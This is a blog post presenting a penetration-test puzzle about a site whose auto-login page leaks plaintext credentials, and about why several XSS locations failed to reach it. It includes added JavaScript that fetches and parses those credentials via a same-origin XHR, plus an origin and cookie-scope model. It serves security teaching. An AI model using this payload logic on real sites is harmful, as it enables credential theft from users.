Monday, February 7, 2011

Tricky exploit - a penetration test puzzle

In a recent application security audit of a web site I came across a big, blaring breach.
While it is always fun to find a good vulnerability, this one turned out to be quite tricky to actually exploit. The trickiness was not due to good security practices but to pure (un)luck, depending on whose point of view you take: every angle I tried was off by just a tiny bit.

Eventually I managed to find an interesting multiphase exploit vector, and I think it makes for some interesting tinkering/reading.  I've created a mock-up replica of the vulnerable web-site to allow for testing and analysis. After reading the introductory section about the vulnerability, you may wish to try your wit against the mock-site and find it yourself, before reading on to the detailed exploit write-up.

The Target Site
This was your ordinary small company site.
It had 3 sub-systems:
1. a public site, available to any user.
2. a client site, requiring a login.
3. a printing system, requiring its own login.

After logging in to the client site, the user was shown a menu containing a link to the printing system. To spare the user a second login, that link reused the credentials given at the client login and passed them on to the printing system for authentication. A poor man's SSO, so to speak.

The Breach
It turned out that this "facilitating" method pulled the user's credentials into a page served to the browser, in clear text, and had the browser post them on to the printing system via a client-side redirect!

Initially the user supplies the login credentials to the client site (login.php).
If successful, a menu is presented (menu.php).
A click on the "Go to Printing" link directs the browser to an intermediate page (printAutoLogin.php) that contains the user's credentials in a pre-filled form, which is immediately auto-submitted to the printing system's login page (printSystem.php), where they are checked for validity.


Figure 1. Client side SSO. First redirect fetches user credentials and passes them to Print System.

The breach is serious and plain to see: the URL printAutoLogin.php returns the current user's name and password in clear text! This information is of course very valuable to an attacker. The only remaining question is how to get at it.
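The harvesting half of the attack, as an added example that is not code from the original post: a constructed stand-in for the page printAutoLogin.php is described as returning (field names, the form action and the host are assumptions), and the logic an XSS payload would run against it. Under a browser the page would be fetched with a same-origin XMLHttpRequest; under Node the fetcher is passed in so the parsing can be exercised offline.

```javascript
// Constructed sample of what printAutoLogin.php is described as returning:
// a pre-filled form that auto-submits the logged-in user's credentials.
// Field names, host and action are assumed; the real site is not named.
const SAMPLE_AUTOLOGIN_PAGE = `<html><body onload="document.forms[0].submit()">
<form method="post" action="https://www.example.com/printSystem.php">
  <input type="hidden" name="username" value="user123">
  <input type="hidden" name="password" value="pass123">
</form></body></html>`;

// Pull name/value pairs out of every <input> tag in the response.
// A regex is enough for a page this simple; in a browser payload
// DOMParser would do the same job.
function extractFormFields(html) {
  const fields = {};
  const inputRe = /<input\b[^>]*>/gi;
  const attrRe = /(\w+)\s*=\s*"([^"]*)"/g;
  for (const tag of html.match(inputRe) || []) {
    const attrs = {};
    for (const m of tag.matchAll(attrRe)) attrs[m[1].toLowerCase()] = m[2];
    if (attrs.name !== undefined) fields[attrs.name] = attrs.value ?? '';
  }
  return fields;
}

// The two fields the attacker cares about.
function extractCredentials(html) {
  const f = extractFormFields(html);
  return { username: f.username, password: f.password };
}

// Payload logic: fetch the auto-login page and parse it. fetchPage is
// injected so this runs under Node; in the browser it is browserFetchPage.
function harvest(fetchPage) {
  return extractCredentials(fetchPage('/printAutoLogin.php'));
}

// Browser-only fetcher. A synchronous same-origin XHR rides on the victim's
// session cookie automatically, so HttpOnly is irrelevant to this vector.
function browserFetchPage(path) {
  const xhr = new XMLHttpRequest();
  xhr.open('GET', path, false);
  xhr.send();
  return xhr.responseText;
}

// Inside the XSS payload (assumed form):
//   alert(JSON.stringify(harvest(browserFetchPage)));
// Offline, against the constructed sample:
//   harvest(() => SAMPLE_AUTOLOGIN_PAGE)  // { username: 'user123', password: 'pass123' }
```

Note that this only works when the script runs on the same origin (scheme, host and port) as printAutoLogin.php; that constraint is exactly what made the XSS locations described below unusable.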

Exploitation Problems
Finding a breach is one thing. Showing a functional proof-of-concept attack exploiting it is sometimes quite another. While the breach is what the client actually pays for, it is the exploit that gets his respect and admiration. Usually getting a working exploit takes some dull, dirty work of fitting loose ends in place, but in this case it turned out to be an interesting puzzle.

What I wanted to do was leverage an XSS vulnerability I had found in the site to get the user's credentials. One way to do this would be to steal the session cookie and use it to fetch the tell-tale URL while impersonating the legitimate user, thereby obtaining his credentials (assuming no IP checks are done). The cookie was set HttpOnly, which made this vector harder.

Another option was to fetch the credentials on the client side (with an XMLHttpRequest issued from the victim's browser) and have them sent directly to the attacker. This sidesteps the HttpOnly problem, since the browser attaches the cookie itself, and would also be much cooler...

In practice XSS flaws were abundant. I found several around the site, but they were all just a bit off. Two were on different sub-domains, so the session cookie was not set there, and the same-origin policy prohibited them from making cross-(sub)-domain XMLHttpRequest calls. Another XSS was actually on the same sub-domain but served over HTTP, whereas the rest of the site was HTTPS, so again no cookie (it carried the Secure flag) and no cross-scheme calls, since the scheme is part of the origin.
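Why each of those XSS locations was "just a bit off", as an added example that is not code from the original post. It models the two checks the browser applies: the same-origin comparison for XMLHttpRequest (scheme, host and port) and the cookie-scope rules (host-only domain, Secure flag, HttpOnly). The host names, the cookie name PHPSESSID and the candidate URLs are assumptions; the page does not name the site.

```javascript
// Assumed target: the credential-leaking page on the HTTPS client site.
const TARGET = 'https://www.example.com/printAutoLogin.php';

// An origin is the (scheme, host, port) triple; default ports are made
// explicit so 'https://h' and 'https://h:443' compare equal.
function originOf(urlString) {
  const u = new URL(urlString);
  const port = u.port || (u.protocol === 'https:' ? '443' : '80');
  return `${u.protocol}//${u.hostname}:${port}`;
}

// Same-origin policy as it applied to XHR in 2011 (no CORS headers here).
function sameOrigin(a, b) {
  return originOf(a) === originOf(b);
}

// Simplified model of whether the browser attaches a cookie to a request.
// A host-only cookie (set without a Domain attribute) goes only to the exact
// host; a Secure cookie never travels over plain HTTP. HttpOnly does not
// affect sending, it only hides the cookie from document.cookie.
function cookieSentTo(cookie, urlString) {
  const u = new URL(urlString);
  const hostOk = cookie.hostOnly
    ? u.hostname === cookie.domain
    : (u.hostname === cookie.domain || u.hostname.endsWith('.' + cookie.domain));
  const secureOk = !cookie.secure || u.protocol === 'https:';
  return hostOk && secureOk;
}

// Assumed session cookie, matching the page's description: HttpOnly, Secure,
// scoped to the client-site host only.
const SESSION_COOKIE = {
  name: 'PHPSESSID', domain: 'www.example.com',
  hostOnly: true, secure: true, httpOnly: true,
};

// What an XSS at a given URL can do against TARGET.
function assessXssLocation(xssUrl) {
  const cookiePresent = cookieSentTo(SESSION_COOKIE, xssUrl);
  return {
    xssUrl,
    canXhrTarget: sameOrigin(xssUrl, TARGET),
    sessionCookiePresent: cookiePresent,
    cookieReadableByScript: cookiePresent && !SESSION_COOKIE.httpOnly,
  };
}

// Constructed candidates mirroring the three "off" locations in the text,
// plus the one that would have worked.
const CANDIDATES = [
  'https://www.example.com/search.php?q=',  // same origin as TARGET
  'https://blog.example.com/view.php?id=',  // different sub-domain
  'https://shop.example.com/item.php?id=',  // different sub-domain
  'http://www.example.com/news.php?id=',    // same host, plain HTTP
];

function usableLocations() {
  return CANDIDATES.filter((u) => assessXssLocation(u).canXhrTarget);
}
```

Running assessXssLocation over CANDIDATES shows the pattern the text describes: only the first entry can both reach TARGET with XHR and carry the session cookie, and even there document.cookie stays empty because of HttpOnly, which is why the XHR vector was preferred over cookie theft.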

Close but no cigar. Yet.

Playground version
Before I continue describing the exploitation method I found, I offer you the chance to play around and find it yourself: I've recreated the relevant parts into a simplified mock-website that you can play around with.

The website home page is:
Valid user credentials are : Name:user123 Password:pass123

You are welcome to stop reading and try your wit against it.
Note that this is not an armchair pen-test riddle. You'll have to get your proxies dirty to find some relevant details that I didn't describe yet to figure it out.

Your goal is to find and craft an XSS payload that will cause the user credentials to be sent to the attacker (an alert box with the info would do).

Feel free to leave your comments.
Please post only non-spoiler comments here, and the rest on the solution entry.

The detailed exploitation is provided in a separate blog entry.


  1. Thank you for sharing, it's a very nice situation and setup. I'll play with it soon.

  2. Awesome! Congratulations!

  3. Yes, how the attacker creates "XSS PAYLOAD 2" is not so clear, and it only works with PHPSESSID=1337.
    Please explain how XSS Payload 2 is added to printAutoLogin.php's password field.

  5. I am really enjoying reading your well written articles.
    I think you spend numerous effort and time updating your site. I have bookmarked it and I am taking a look ahead to reading new articles.